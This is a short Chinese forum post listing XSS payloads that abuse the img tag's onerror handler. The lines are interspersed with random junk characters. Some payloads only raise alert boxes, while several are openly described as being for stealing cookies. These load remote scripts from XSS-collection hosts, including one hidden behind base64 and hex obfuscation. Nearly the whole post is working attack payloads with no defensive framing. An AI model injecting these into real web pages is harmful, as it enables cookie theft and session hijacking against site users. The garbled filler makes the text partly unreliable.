img标签的常用几种测试手段

admin

<img src='non-exist.jpg'onerror="alert('xss')">
# _% v9 ?  k* o; D: j0 w<img src=# onerror=alert(123)>
, Q* [  {$ l$ Z; d$ K) ?<img src=# onerror=alert(document.cookie)>
4 ]3 X" U1 }( ]下面是利用平台钓cookie的
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
, `( P0 T) h1 F- i- i. D; }

: ]" p9 y( h$ @- V" b" W<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
6 {) `. ]' C5 p7 K“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
) I6 g# n, h4 s3 S<img src=1 onerror=jQuery.getScript("//xss.re/974")>
<img src="#">
<img src="#">
) h3 W; T* k$ U0 ~' e<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
$ u  z9 {* ]5 Y8 }+ M* [<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">
- F8 o" r4 ^& M: ], V! a<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
<img src=x width="0" height="0"></img>
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
' E) {$ `. M! O  B) r" B7 J! n4 e- y/ }<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
/ r7 h& R: g3 {8 p( h